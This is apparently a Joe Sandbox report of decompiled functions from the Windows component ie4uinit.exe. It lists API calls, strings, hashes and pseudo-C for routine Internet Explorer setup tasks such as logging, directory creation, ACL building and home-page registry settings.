Snapshot File: hcaresult_9_2_7ff7319c0000_ie4uinit.jbxd

Similarity

API ID: wcscat_s$FileFind$FolderPath$AttributesCloseErrorFirstLastNext
String ID:
API String ID: 1467164853-0
Opcode ID: 64e02491cb4010ce5e86047037c906d86cbcb6d2299f06950c81cfadf552dd9f
Instruction ID: e49f9c3ee454e33f6ee6932e5ae48084ce39265a48c30b21d50e4802b29a8ef1
Opcode Fuzzy Hash: 64e02491cb4010ce5e86047037c906d86cbcb6d2299f06950c81cfadf552dd9f
Instruction Fuzzy Hash: 0381B532E187C2A6EB60AB35D5406AEB3A0FB4475CFC05135DACD47A88EF6CE551DB20

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF7319CB2C4 Relevance: 12.3, APIs: 4, Strings: 3, Instructions: 42
libraryloaderCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00007FF7319C6638: InitOnceExecuteOnce.KERNEL32(?,?,?,?,00007FF7319CB2D5), ref: 00007FF7319C6650

LoadLibraryW.KERNEL32 ref: 00007FF7319CB2E0
GetProcAddress.KERNEL32 ref: 00007FF7319CB2F8
LocalFree.KERNEL32 ref: 00007FF7319CB340
FreeLibrary.KERNEL32 ref: 00007FF7319CB349

Strings

slc.dll, xrefs: 00007FF7319CB2D9
SLGetWindowsInformation, xrefs: 00007FF7319CB2EE
shell32-license-UseBingAsDefaultSearchProvider, xrefs: 00007FF7319CB312

Memory Dump Source

Source File: 00000009.00000002.325779833.00007FF7319C1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7319C0000, based on PE: true

Associated: 00000009.00000002.325768067.00007FF7319C0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000009.00000002.325815225.00007FF7319E5000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000009.00000002.325831661.00007FF7319F4000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000009.00000002.325836429.00007FF7319F6000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000009.00000002.325836429.00007FF7319F9000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_7ff7319c0000_ie4uinit.jbxd

Similarity

API ID: FreeLibraryOnce$AddressExecuteInitLoadLocalProc
String ID: SLGetWindowsInformation$shell32-license-UseBingAsDefaultSearchProvider$slc.dll
API String ID: 3052823752-3737774969
Opcode ID: 772a31fb7a85bf047e01a29ba095c824e92487191fb3924192b1c1c43bb95f5e
Instruction ID: f96f5f216a63ccc6f771ded03b34fed8443517ed93ed08526d41cb14830626ae
Opcode Fuzzy Hash: 772a31fb7a85bf047e01a29ba095c824e92487191fb3924192b1c1c43bb95f5e
Instruction Fuzzy Hash: 40112125E4D6C6A2EF10AB10E584079E7B0EF45789F844035D98E02268DFADE448EB31

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF7319C5974 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 61
windowtimethreadCOMMON

Download Yara Rule

C-Code - Quality: 21%

			E00007FF77FF7319C5974(void* __rcx, long long __rdx, long long __r8, long long __r9, long long _a16, char _a24, long long _a32) {
				signed int _v40;
				signed short _v44;
				signed short _v46;
				signed short _v48;
				signed short _v50;
				signed short _v54;
				signed short _v56;
				char _v64;
				char _v72;
				signed int _v80;
				signed int _v88;
				signed int _v96;
				signed int _v104;
				long _t33;
				int _t34;
				signed long long _t48;
				long long _t53;
				void* _t64;

				_a16 = __rdx;
				_a24 = __r8;
				_a32 = __r9;
				_t48 =  *0x319f4658; // 0x8be7dd1f02a
				_v40 = _t48 ^ _t64 - 0x00000070;
				if ( *((intOrPtr*)(__rcx + 8)) <= 0) goto 0x319c5a44;
				GetLocalTime(??);
				r10d = _v56 & 0x0000ffff;
				r9d = _v50 & 0x0000ffff;
				r8d = _v54 & 0x0000ffff;
				_v80 = _v44 & 0x0000ffff;
				_v88 = _v46 & 0x0000ffff;
				_v96 = _v48 & 0x0000ffff;
				_v104 = r10d;
				E00007FF77FF7319C5A5C(__rcx, L"%1!02d!/%2!02d!/%3!04d!:%4!02d!:%5!02d!:%6!02d!: ", __r8, __r9); // executed
				_v64 =  &_a24;
				r9d = 0;
				_v72 = _t53;
				_v88 =  &_v64;
				r8d = 0;
				_v96 = 0;
				_v104 =  &_v72;
				_t33 = FormatMessageW(??, ??, ??, ??, ??, ??, ??);
				if (_v72 == 0) goto 0x319c5a44;
				r8d = _t33; // executed
				_t34 = PostThreadMessageW(??, ??, ??, ??); // executed
				return E00007FF77FF7319E38D0(0 | _t34 != 0x00000000,  *((intOrPtr*)(__rcx + 8)), _v40 ^ _t64 - 0x00000070);
			}

0x7ff7319c5974
0x7ff7319c5979
0x7ff7319c597e
0x7ff7319c598d
0x7ff7319c5997
0x7ff7319c59a3
0x7ff7319c59ad
0x7ff7319c59bf
0x7ff7319c59c4
0x7ff7319c59c9
0x7ff7319c59ce
0x7ff7319c59d2
0x7ff7319c59d9
0x7ff7319c59e4
0x7ff7319c59e9
0x7ff7319c59f6
0x7ff7319c59fa
0x7ff7319c5a01
0x7ff7319c5a05
0x7ff7319c5a0a
0x7ff7319c5a11
0x7ff7319c5a1a
0x7ff7319c5a1f
0x7ff7319c5a2c
0x7ff7319c5a36
0x7ff7319c5a39
0x7ff7319c5a59

APIs

GetLocalTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF7319C1773), ref: 00007FF7319C59AD

Part of subcall function 00007FF7319C5A5C: FormatMessageW.KERNEL32(?,?,?,?,?,?,?,?,?,00000000,00007FF7319C59EE), ref: 00007FF7319C5AA6
Part of subcall function 00007FF7319C5A5C: PostThreadMessageW.USER32 ref: 00007FF7319C5AC1

FormatMessageW.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF7319C1773), ref: 00007FF7319C5A1F
PostThreadMessageW.USER32 ref: 00007FF7319C5A39

Strings

%1!02d!/%2!02d!/%3!04d!:%4!02d!:%5!02d!:%6!02d!: , xrefs: 00007FF7319C59DD

Memory Dump Source

Source File: 00000009.00000002.325779833.00007FF7319C1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7319C0000, based on PE: true

Associated: 00000009.00000002.325768067.00007FF7319C0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000009.00000002.325815225.00007FF7319E5000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000009.00000002.325831661.00007FF7319F4000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000009.00000002.325836429.00007FF7319F6000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000009.00000002.325836429.00007FF7319F9000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_7ff7319c0000_ie4uinit.jbxd

Similarity

API ID: Message$FormatPostThread$LocalTime
String ID: %1!02d!/%2!02d!/%3!04d!:%4!02d!:%5!02d!:%6!02d!:
API String ID: 2193567623-20010298
Opcode ID: 8e3263cc699ecd0aa0c82a912417d6bd80a7a379467089e1f252b253ad87bcc9
Instruction ID: 99fb3c4aba264e81350b73077aca3b728753729bdbb372eef13a1039a8d755a6
Opcode Fuzzy Hash: 8e3263cc699ecd0aa0c82a912417d6bd80a7a379467089e1f252b253ad87bcc9
Instruction Fuzzy Hash: 67215C73F18B519AE7109FA1E4809ADB7B4F74875CB845539EE8D13B58DB38C150DB20

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF7319E3DA0 Relevance: 1.5, APIs: 1, Instructions: 6COMMON

Download Yara Rule

APIs

SetUnhandledExceptionFilter.KERNEL32 ref: 00007FF7319E3DAB

Memory Dump Source

Source File: 00000009.00000002.325779833.00007FF7319C1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7319C0000, based on PE: true

Associated: 00000009.00000002.325768067.00007FF7319C0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000009.00000002.325815225.00007FF7319E5000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000009.00000002.325831661.00007FF7319F4000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000009.00000002.325836429.00007FF7319F6000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000009.00000002.325836429.00007FF7319F9000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_7ff7319c0000_ie4uinit.jbxd

Similarity

API ID: ExceptionFilterUnhandled
String ID:
API String ID: 3192549508-0
Opcode ID: 110c649ca0281d20594c563d757f563e5d0fb9d2cd1ca0146d1c711132392f09
Instruction ID: 94fe988696958e15a909bd37e4425e9a7eb3e0b315fb16b4fb4b5abe4a7fd158
Opcode Fuzzy Hash: 110c649ca0281d20594c563d757f563e5d0fb9d2cd1ca0146d1c711132392f09
Instruction Fuzzy Hash: 35B01220F2E4C7E1D704BB21EC810A053A07F5C328FC08470C00D80124DE9CD2DB9730

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF7319CA854 Relevance: 33.5, APIs: 18, Strings: 1, Instructions: 248
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 26%

			E00007FF77FF7319CA854(void* __ecx, void* __edx, void* __esi, void* __eflags, long long __rbx, void* __rdx, signed long long __rdi, long long __rsi, void* __r8, void* __r9, void* __r10) {
				void* __rbp;
				void* _t59;
				void* _t60;
				void* _t67;
				signed short _t68;
				signed int _t69;
				int _t70;
				void* _t71;
				int _t72;
				signed short _t73;
				void* _t76;
				long _t77;
				int _t78;
				signed short _t79;
				signed int _t82;
				void* _t90;
				void* _t140;
				void* _t163;
				signed long long _t164;
				signed long long _t167;
				signed long long _t168;
				void* _t195;
				signed long long _t199;
				signed long long _t201;
				WCHAR* _t209;
				void* _t212;
				signed long long _t213;
				WCHAR* _t225;
				int _t227;
				int _t229;
				void* _t232;

				_t199 = __rdi;
				_t195 = __rdx;
				_t170 = __rbx;
				_t125 = __esi;
				_t163 = _t212;
				 *((long long*)(_t163 + 8)) = __rbx;
				 *((long long*)(_t163 + 0x10)) = __rsi;
				 *((long long*)(_t163 + 0x18)) = __rdi;
				_t210 = _t163 - 0x3b8;
				_t213 = _t212 - 0x490;
				_t164 =  *0x319f4658; // 0x8be7dd1f02a
				 *(_t163 - 0x3b8 + 0x380) = _t164 ^ _t213;
				r13d = 0;
				r12b = __edx;
				_t82 = r13d;
				_t6 = _t227 + 1; // 0x1
				r9b = r12b;
				r8b = dil; // executed
				_t59 = E00007FF77FF7319CA568(__esi, __rbx, (_t82 << 5) + 0x319f4180, __rdx, __rdi, __rsi, __r9); // executed
				if (_t59 < 0) goto 0x319cab3f;
				if (_t82 + _t6 - 7 < 0) goto 0x319ca898;
				r15d = r13d;
				_t8 = _t195 + 0x20; // 0x20
				r8d = _t8;
				_t60 = memset(_t232, _t229, _t227);
				r9d = 0x104;
				__imp__#820(); // executed
				if (_t60 < 0) goto 0x319ca9b1;
				 *(_t213 + 0x40) =  *(_t213 + 0x40) | 0xffffffff;
				 *((intOrPtr*)(_t213 + 0x44)) =  *0x7FF7319F4378;
				 *((intOrPtr*)(_t213 + 0x48)) =  *0x319f437c;
				 *((intOrPtr*)(_t213 + 0x58)) =  *0x7FF7319F4380;
				_t167 = _t213 + 0x60;
				_t201 = (_t199 | 0xffffffff) + 1;
				if ( *((intOrPtr*)(_t167 + _t201 * 2)) != r13w) goto 0x319ca920;
				_t21 = _t201 + 1; // 0x3
				 *(_t213 + 0x50) = _t227;
				if (_t21 - _t201 < 0) goto 0x319ca9a7;
				 *(_t213 + 0x50) = _t227;
				if (_t195 != 0) goto 0x319ca94f;
				goto 0x319ca958;
				_t168 = _t167 | 0xffffffff;
				if (0x80070216 < 0) goto 0x319ca979;
				__imp__CoTaskMemAlloc();
				 *(_t213 + 0x50) = _t168;
				if (_t168 == 0) goto 0x319ca974;
				goto 0x319ca980;
				if (0x8007000e < 0) goto 0x319ca9ac;
				 *((intOrPtr*)(_t213 + 0x30)) = 0x300;
				 *(_t213 + 0x28) = _t227;
				 *(_t213 + 0x20) = _t227;
				E00007FF77FF7319C6DC8(0x8007000e, _t170, _t227, _t21, _t201, 0x319f437c, _t213 + 0x60, _t201, __r10);
				goto 0x319ca9ac;
				if (0x80070216 < 0) goto 0x319ca9da;
				r9b = r12b;
				r8b = dil; // executed
				_t67 = E00007FF77FF7319CA568(_t125, _t170, _t213 + 0x40, _t21, _t201, 0x319f437c, _t201); // executed
				_t90 = _t67;
				__imp__CoTaskMemFree();
				if (_t90 < 0) goto 0x319cab3f;
				r15d = r15d + 1;
				if (r15d - 6 < 0) goto 0x319ca8cd;
				if (_t90 < 0) goto 0x319cab3f;
				r14d = r13d;
				r15d = 0x2002;
				r12d = 0x80070000;
				_t140 =  *0x319f4ee1 - r13b; // 0x1
				if (_t140 != 0) goto 0x319caa4d;
				 *0x319f4ee1 = dil;
				__imp__#793();
				if (_t67 != 2) goto 0x319caa4d;
				_t68 = GetCurrentProcess();
				__imp__#139();
				_t103 =  !=  ? 1 :  *0x319f4ee0 & 0x000000ff;
				 *0x319f4ee0 =  !=  ? 1 :  *0x319f4ee0 & 0x000000ff;
				r9d = 0x104;
				__imp__#820(); // executed
				if (_t68 < 0) goto 0x319cab3f;
				r8d = 0;
				__imp__SHCreateDirectoryExW(); // executed
				if (_t68 == 0) goto 0x319caa9b;
				if (_t68 == 0x50) goto 0x319caa9b;
				if (_t68 == 0xb7) goto 0x319caa9b;
				_t122 =  <=  ? _t68 : _t68 & 0x0000ffff | r12d;
				goto 0x319caab9;
				_t69 = GetFileAttributesW(_t225); // executed
				if ((r15d & _t69) != 0) goto 0x319caabd;
				_t70 = SetFileAttributesW(_t209);
				_t149 =  <=  ? _t68 : _t68 & 0x0000ffff | r12d;
				if (( <=  ? _t68 : _t68 & 0x0000ffff | r12d) < 0) goto 0x319cab3a;
				r9d = 0x104;
				__imp__#820(); // executed
				if (_t70 < 0) goto 0x319cab3f;
				 *(_t213 + 0x28) = _t227;
				_t43 = _t201 + 2; // 0x3
				r9d = _t43;
				r8d = 0;
				 *(_t213 + 0x20) = r13d;
				_t45 = _t213 + 0x60; // 0x80070060, executed
				_t71 = E00007FF77FF7319CA4D8(_t70, dil,  *0x319f4400, _t45, 0x319f4400, _t163 - 0x3b8, __r10); // executed
				if (_t71 < 0) goto 0x319cab3f;
				_t72 = SetFileAttributesW(??, ??); // executed
				if (_t72 != 0) goto 0x319cab23;
				_t73 = GetLastError();
				_t94 =  <=  ? _t73 : _t73 & 0x0000ffff | r12d;
				_t154 =  <=  ? _t73 : _t73 & 0x0000ffff | r12d;
				if (( <=  ? _t73 : _t73 & 0x0000ffff | r12d) < 0) goto 0x319cab3f;
				r14d = r14d + 1;
				if (r14d - 4 < 0) goto 0x319caa09;
				goto 0x319cab3f;
				if (GetTempPathW(??, ??) == 0) goto 0x319cabbf;
				if (E00007FF77FF7319C9348(_t125, _t227,  *0x319f4400, _t163 - 0x3b8 + 0x170, _t163 - 0x3b8 + 0x170, 0x7ff7319f4408, L"Low", __r10) < 0) goto 0x319cabd3;
				 *(_t213 + 0x28) = _t227;
				r9d = 3;
				 *(_t213 + 0x20) = r13d;
				r8d = 0;
				_t76 = E00007FF77FF7319CA4D8(_t75, dil,  *0x319f4400, _t163 - 0x3b8 + 0x170, 0x7ff7319f4408, _t210, __r10); // executed
				if (_t76 < 0) goto 0x319cabd3;
				_t77 = GetFileAttributesW(??); // executed
				if (_t77 == 0xffffffff) goto 0x319cabbf;
				asm("bts eax, 0xd");
				_t78 = SetFileAttributesW(??, ??); // executed
				if (_t78 != 0) goto 0x319cabd3;
				_t79 = GetLastError();
				_t99 =  <=  ? _t79 : _t79 & 0x0000ffff | 0x80070000;
				_t80 =  <=  ? _t79 : _t79 & 0x0000ffff | 0x80070000;
				return E00007FF77FF7319E38D0( <=  ? _t79 : _t79 & 0x0000ffff | 0x80070000, 0x104,  *(_t210 + 0x380) ^ _t213);
			}

0x7ff7319ca854
0x7ff7319ca854
0x7ff7319ca854
0x7ff7319ca854
0x7ff7319ca854
0x7ff7319ca857
0x7ff7319ca85b
0x7ff7319ca85f
0x7ff7319ca86c
0x7ff7319ca873
0x7ff7319ca87a
0x7ff7319ca884
0x7ff7319ca88b
0x7ff7319ca88e
0x7ff7319ca891
0x7ff7319ca894
0x7ff7319ca8a6
0x7ff7319ca8ac
0x7ff7319ca8af
0x7ff7319ca8b6
0x7ff7319ca8c1
0x7ff7319ca8c3
0x7ff7319ca8d4
0x7ff7319ca8d4
0x7ff7319ca8d8
0x7ff7319ca8e6
0x7ff7319ca8ee
0x7ff7319ca8f8
0x7ff7319ca901
0x7ff7319ca906
0x7ff7319ca910
0x7ff7319ca917
0x7ff7319ca91b
0x7ff7319ca920
0x7ff7319ca928
0x7ff7319ca92a
0x7ff7319ca92e
0x7ff7319ca936
0x7ff7319ca93d
0x7ff7319ca948
0x7ff7319ca94d
0x7ff7319ca94f
0x7ff7319ca95a
0x7ff7319ca95f
0x7ff7319ca965
0x7ff7319ca96d
0x7ff7319ca972
0x7ff7319ca97e
0x7ff7319ca980
0x7ff7319ca98d
0x7ff7319ca998
0x7ff7319ca9a0
0x7ff7319ca9a5
0x7ff7319ca9b3
0x7ff7319ca9b5
0x7ff7319ca9bd
0x7ff7319ca9c0
0x7ff7319ca9ca
0x7ff7319ca9cc
0x7ff7319ca9d4
0x7ff7319ca9da
0x7ff7319ca9e5
0x7ff7319ca9ed
0x7ff7319ca9f3
0x7ff7319ca9fd
0x7ff7319caa03
0x7ff7319caa09
0x7ff7319caa13
0x7ff7319caa1a
0x7ff7319caa21
0x7ff7319caa2a
0x7ff7319caa2c
0x7ff7319caa35
0x7ff7319caa44
0x7ff7319caa47
0x7ff7319caa4d
0x7ff7319caa5d
0x7ff7319caa65
0x7ff7319caa6b
0x7ff7319caa78
0x7ff7319caa80
0x7ff7319caa85
0x7ff7319caa8c
0x7ff7319caa96
0x7ff7319caa99
0x7ff7319caaa0
0x7ff7319caaa9
0x7ff7319caab3
0x7ff7319caab9
0x7ff7319caabb
0x7ff7319caac9
0x7ff7319caad2
0x7ff7319caada
0x7ff7319caadc
0x7ff7319caae1
0x7ff7319caae1
0x7ff7319caae5
0x7ff7319caae8
0x7ff7319caaf0
0x7ff7319caaf5
0x7ff7319caafe
0x7ff7319cab08
0x7ff7319cab10
0x7ff7319cab12
0x7ff7319cab20
0x7ff7319cab23
0x7ff7319cab25
0x7ff7319cab27
0x7ff7319cab32
0x7ff7319cab38
0x7ff7319cab53
0x7ff7319cab6c
0x7ff7319cab6e
0x7ff7319cab7a
0x7ff7319cab80
0x7ff7319cab85
0x7ff7319cab8b
0x7ff7319cab94
0x7ff7319cab9d
0x7ff7319caba6
0x7ff7319caba8
0x7ff7319cabb5
0x7ff7319cabbd
0x7ff7319cabbf
0x7ff7319cabd0
0x7ff7319cabd3
0x7ff7319cac04

APIs

Part of subcall function 00007FF7319CA568: SetFileAttributesW.KERNEL32 ref: 00007FF7319CA66D
Part of subcall function 00007FF7319CA568: wcscat_s.MSVCRT ref: 00007FF7319CA72C
Part of subcall function 00007FF7319CA568: wcscat_s.MSVCRT ref: 00007FF7319CA743
Part of subcall function 00007FF7319CA568: FindFirstFileW.KERNEL32 ref: 00007FF7319CA755

memset.MSVCRT ref: 00007FF7319CA8D8
#820.IERTUTIL ref: 00007FF7319CA8EE
CoTaskMemAlloc.OLE32 ref: 00007FF7319CA95F
CoTaskMemFree.OLE32 ref: 00007FF7319CA9CC
#793.IERTUTIL ref: 00007FF7319CAA21
GetCurrentProcess.KERNEL32 ref: 00007FF7319CAA2C
#139.IERTUTIL ref: 00007FF7319CAA35
#820.IERTUTIL ref: 00007FF7319CAA5D
SHCreateDirectoryExW.SHELL32 ref: 00007FF7319CAA78
GetFileAttributesW.KERNEL32 ref: 00007FF7319CAAA0
SetFileAttributesW.KERNEL32 ref: 00007FF7319CAAB3
#820.IERTUTIL ref: 00007FF7319CAAD2
SetFileAttributesW.KERNEL32 ref: 00007FF7319CAB08
GetLastError.KERNEL32 ref: 00007FF7319CAB12
GetTempPathW.KERNEL32 ref: 00007FF7319CAB4B
GetFileAttributesW.KERNEL32 ref: 00007FF7319CAB9D
SetFileAttributesW.KERNEL32 ref: 00007FF7319CABB5
GetLastError.KERNEL32 ref: 00007FF7319CABBF

Strings

Low, xrefs: 00007FF7319CAB55

Memory Dump Source

Source File: 00000009.00000002.325779833.00007FF7319C1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7319C0000, based on PE: true

Associated: 00000009.00000002.325768067.00007FF7319C0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000009.00000002.325815225.00007FF7319E5000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000009.00000002.325831661.00007FF7319F4000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000009.00000002.325836429.00007FF7319F6000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000009.00000002.325836429.00007FF7319F9000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_7ff7319c0000_ie4uinit.jbxd

Similarity

API ID: File$Attributes$#820$ErrorLastTaskwcscat_s$#139#793AllocCreateCurrentDirectoryFindFirstFreePathProcessTempmemset
String ID: Low
API String ID: 1277562531-2865053249
Opcode ID: f2894baa83cacf3801aed46f26785fe208f282d279c5377f21632f7fa65eb7e4
Instruction ID: b82ef5a288ddcceb2d8c56422c9828ba8c44792502e8d11540983bad224d5f74
Opcode Fuzzy Hash: f2894baa83cacf3801aed46f26785fe208f282d279c5377f21632f7fa65eb7e4
Instruction Fuzzy Hash: 5FA19235F0C7C2A2E710AB21E8442AAA7A5BF8475CFC05135DACD47698EFBDE445E720

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF7319C18B0 Relevance: 26.4, APIs: 9, Strings: 6, Instructions: 113
libraryloaderCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetProcAddress.KERNEL32 ref: 00007FF7319C18D7
ConvertSidToStringSidW.ADVAPI32 ref: 00007FF7319C191D
SysStringLen.OLEAUT32 ref: 00007FF7319C1974
VarBstrCat.OLEAUT32 ref: 00007FF7319C198E
SysFreeString.OLEAUT32 ref: 00007FF7319C199E
LocalFree.KERNEL32 ref: 00007FF7319C19E9
SysFreeString.OLEAUT32 ref: 00007FF7319C19F2

Part of subcall function 00007FF7319C1440: SysAllocStringLen.OLEAUT32 ref: 00007FF7319C14AB
Part of subcall function 00007FF7319C1440: SysStringLen.OLEAUT32 ref: 00007FF7319C14BC
Part of subcall function 00007FF7319C1440: memcpy_s.MSVCRT ref: 00007FF7319C14D8
Part of subcall function 00007FF7319C1440: memcpy_s.MSVCRT ref: 00007FF7319C150A
Part of subcall function 00007FF7319C1440: SysFreeString.OLEAUT32 ref: 00007FF7319C1533

GetLastError.KERNEL32 ref: 00007FF7319C19FA
FreeSid.ADVAPI32 ref: 00007FF7319C1A1D

Part of subcall function 00007FF7319C1440: SysStringLen.OLEAUT32 ref: 00007FF7319C148B

Strings

DeriveAppContainerSidFromAppContainerName, xrefs: 00007FF7319C18D0
Unable to Append Sid for %1!ls! to Extended ACL. Result:%2!lx!, xrefs: 00007FF7319C19B3
Unable to get SID for %1!ls!. Result:%2!lx!, xrefs: 00007FF7319C1A28
(A;CI;KR;;;, xrefs: 00007FF7319C1930
Unable to convert Sid to string for %1!ls!. Result:%2!lx!, xrefs: 00007FF7319C1A03
Unable to Format Sid for %1!ls! to append to Extended ACL., xrefs: 00007FF7319C19CE

Memory Dump Source

Source File: 00000009.00000002.325779833.00007FF7319C1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7319C0000, based on PE: true

Associated: 00000009.00000002.325768067.00007FF7319C0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000009.00000002.325815225.00007FF7319E5000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000009.00000002.325831661.00007FF7319F4000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000009.00000002.325836429.00007FF7319F6000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000009.00000002.325836429.00007FF7319F9000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_7ff7319c0000_ie4uinit.jbxd

Similarity

API ID: String$Free$memcpy_s$AddressAllocBstrConvertErrorLastLocalProc
String ID: (A;CI;KR;;;$DeriveAppContainerSidFromAppContainerName$Unable to Append Sid for %1!ls! to Extended ACL. Result:%2!lx!$Unable to Format Sid for %1!ls! to append to Extended ACL.$Unable to convert Sid to string for %1!ls!. Result:%2!lx!$Unable to get SID for %1!ls!. Result:%2!lx!
API String ID: 1465574776-613229433
Opcode ID: 63d7ac290206d7998762c433c15d954cd6adc7dde05e31cbbb2700be175e8c96
Instruction ID: 56e24cd1502bd9032c80f5e336df0557677be391b13ebfb29719b62584829bf2
Opcode Fuzzy Hash: 63d7ac290206d7998762c433c15d954cd6adc7dde05e31cbbb2700be175e8c96
Instruction Fuzzy Hash: 09510025F08A83F1EB00AF56E8502F9A760BF44B9CF804032DE8D57669DEB8E145E774

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF7319C16CC Relevance: 22.9, APIs: 5, Strings: 8, Instructions: 102
registryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00007FF7319C5974: GetLocalTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF7319C1773), ref: 00007FF7319C59AD
Part of subcall function 00007FF7319C5974: FormatMessageW.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF7319C1773), ref: 00007FF7319C5A1F
Part of subcall function 00007FF7319C5974: PostThreadMessageW.USER32 ref: 00007FF7319C5A39

RegOpenKeyExW.KERNEL32 ref: 00007FF7319C1794
memset.MSVCRT ref: 00007FF7319C17B0
RegQueryValueExW.KERNEL32 ref: 00007FF7319C17DE
RegSetValueExW.ADVAPI32 ref: 00007FF7319C1857
RegCloseKey.ADVAPI32 ref: 00007FF7319C1874

Strings

Original First Home Page Text:[%1!ls!]., xrefs: 00007FF7319C1821
An invalid value is set in the reg value., xrefs: 00007FF7319C17F7
Setting Home Page., xrefs: 00007FF7319C1712
Setting Home Page. Failed to open registry Key, xrefs: 00007FF7319C187C
Original First Home Page Result:%1!lx!, xrefs: 00007FF7319C180B
Software\microsoft\Internet Explorer\Main, xrefs: 00007FF7319C1786
`, xrefs: 00007FF7319C183C
Writing Single Home Page to XP Result:%2!lx!, xrefs: 00007FF7319C185D

Memory Dump Source

Source File: 00000009.00000002.325779833.00007FF7319C1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7319C0000, based on PE: true

Associated: 00000009.00000002.325768067.00007FF7319C0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000009.00000002.325815225.00007FF7319E5000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000009.00000002.325831661.00007FF7319F4000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000009.00000002.325836429.00007FF7319F6000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000009.00000002.325836429.00007FF7319F9000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_7ff7319c0000_ie4uinit.jbxd

Similarity

API ID: MessageValue$CloseFormatLocalOpenPostQueryThreadTimememset
String ID: An invalid value is set in the reg value.$Original First Home Page Result:%1!lx!$Original First Home Page Text:[%1!ls!].$Setting Home Page.$Setting Home Page. Failed to open registry Key$Software\microsoft\Internet Explorer\Main$Writing Single Home Page to XP Result:%2!lx!$`
API String ID: 3787667049-2357394903
Opcode ID: 0eb158de50ab65995a79ebbacd345d4939a37f8004793b714fb6970c9286ca97
Instruction ID: 1563fee18a7260d5f32098ef6fb4e9298be6ce3a7e7597895bb53579747d2956
Opcode Fuzzy Hash: 0eb158de50ab65995a79ebbacd345d4939a37f8004793b714fb6970c9286ca97
Instruction Fuzzy Hash: D4514021E1CAC2A5EB15AB18E8411F9B361FF84798FC05132ED8D02629EFBCE145DB61

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF7319C1A70 Relevance: 17.6, APIs: 5, Strings: 5, Instructions: 52
registrymemorylibraryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

RegOpenKeyExW.KERNEL32 ref: 00007FF7319C1A9A
SysAllocString.OLEAUT32 ref: 00007FF7319C1AAB
LoadLibraryW.KERNEL32 ref: 00007FF7319C1ACA
#38.IERTUTIL ref: 00007FF7319C1AEF
SysFreeString.OLEAUT32 ref: 00007FF7319C1B12

Part of subcall function 00007FF7319C18B0: GetProcAddress.KERNEL32 ref: 00007FF7319C18D7
Part of subcall function 00007FF7319C18B0: ConvertSidToStringSidW.ADVAPI32 ref: 00007FF7319C191D
Part of subcall function 00007FF7319C18B0: SysStringLen.OLEAUT32 ref: 00007FF7319C1974
Part of subcall function 00007FF7319C18B0: VarBstrCat.OLEAUT32 ref: 00007FF7319C198E
Part of subcall function 00007FF7319C18B0: SysFreeString.OLEAUT32 ref: 00007FF7319C199E
Part of subcall function 00007FF7319C18B0: LocalFree.KERNEL32 ref: 00007FF7319C19E9
Part of subcall function 00007FF7319C18B0: SysFreeString.OLEAUT32 ref: 00007FF7319C19F2
Part of subcall function 00007FF7319C18B0: FreeSid.ADVAPI32 ref: 00007FF7319C1A1D

Strings

Userenv.dll, xrefs: 00007FF7319C1AC1
SOFTWARE\Microsoft\Internet Explorer\TypedURLs, xrefs: 00007FF7319C1A8C
